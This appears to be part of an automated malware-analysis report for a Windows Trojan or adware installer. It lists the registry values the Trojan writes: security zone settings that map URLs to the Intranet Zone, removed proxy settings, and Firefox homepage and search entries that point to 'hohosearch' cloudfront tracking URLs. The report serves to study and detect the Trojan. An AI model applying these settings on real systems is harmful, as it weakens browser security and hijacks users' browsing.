"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"o" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKU\.DEFAULT\Software\ADCA2197E17DE989DA91F56322BE0AB0]
"d" = "20160719"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"Day" = "20160719"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKU\.DEFAULT\Software\{8C4CE252-7DB2-4F8E-8E76-BAD0E5826A83}]
"Day" = "20160719"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE E2 1B F9 8B 29 F0 74 C2 42 39 8C 5D BE EE 6F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateSrv\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\chcUpdateSrv\DEBUG]
"Trace Level"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
The process chcUpdateSrv.html5:548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 8B C1 73 98 FB 1E AB A1 D6 76 64 68 27 B7 57"
The process ckehack.html5:1692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft]
"help" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=loadmex"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 5B E1 3B 4D 28 1C B9 D1 41 D5 BC 8C 3E 05 E5"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKCU\Software\Microsoft]
"First" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The process ckehack.html5:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7A 37 E0 7B AF 05 D1 FD 9A 2C EE AA D8 71 AE 19"
[HKLM\SOFTWARE\{E6276374-DE18-4AA5-A365-9016A2F98A2D}]
"F" = "1"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\Coabuied\DeElevator.dllg1t,"
[HKLM\SOFTWARE\{E6276374-DE18-4AA5-A365-9016A2F98A2D}]
"c" = "1"
The process ckehack.html5:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\ckehack\DEBUG]
"Trace Level" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 29 58 D2 57 A0 E4 18 4F 29 D9 F6 04 11 22 77"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\ckehack\DEBUG]
"Trace Level"
The process ckehack.html5:2032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"UID" = "ADCA2197E17DE989DA91F56322BE0AB0"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"hp" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SPName" = "hohosearch"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"s" = "HtTp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=%s&update0=version,%s&update1=sys,%s&update4=ref,%s&update5=mode,%s&update6=sys0,%s&update7=sys1,%s&update8=sys2,%s&update9=sys3,%s&update10=sys4,%s"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"UID" = "ADCA2197E17DE989DA91F56322BE0AB0"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SP" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&q={searchTerms}&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffsengext"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"s" = "HtTp://d2jeaw7c5nmwo6.cloudfront.net/gkozn0k4?uid=%s&update0=version,%s&update1=sys,%s&update4=ref,%s&update5=mode,%s&update6=sys0,%s&update7=sys1,%s&update8=sys2,%s&update9=sys3,%s&update10=sys4,%s"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"tab" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
"SP" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&q={searchTerms}&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffsengext"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"surl" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffexttoolbar&q="
[HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"surl" = "http://d2ucfwpxlh3zh3.cloudfront.net/chrome.php?uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&ts=AHEqC3UsBH8sC0..&v=20160718&mode=ffexttoolbar&q="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 59 2E 1E 9D DB 08 4E 38 1B DC F1 F2 1B B8 9C"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"SPName" = "hohosearch"
"tab" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKCU\Software\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}]
"hp" = "http://d2ucfwpxlh3zh3.cloudfront.net/?ts=AHEqC3UsBH8sC0..&v=20160718&uid=ADCA2197E17DE989DA91F56322BE0AB0&ptid=amz&mode=ffsengext"
The process nop.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 64 A8 0F 9E 15 B8 FB F7 3D D2 89 25 4F AA A9"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 1.tmp.exe:1340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 B4 B5 9A 60 BD 66 BF A9 06 E5 3D 38 69 57 7B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7548__10235_il2.exe" = "X-Series Install Package"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 1.tmp.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 77 2B EA EF BB 9B 67 8D AB F9 80 A8 61 70 E5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7604__99999_il2.exe" = "X-Series Install Package"
[HKCU\Software\InstallPath\Status]
"NationZoom" = "N"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process 1.tmp.exe:2732 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F C2 A3 79 77 97 46 C8 D9 A0 4F 85 78 6E E8 E8"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"amisetup7816__16582_il2.exe" = "X-Series Install Package"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process ping.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 81 74 47 6D B1 95 4B 8C EB 04 05 03 8B 92 8B"
The process ping.exe:1008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 5B C3 2B C6 47 28 1C 54 78 93 A1 89 49 C6 E1"
The process %original file name%.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
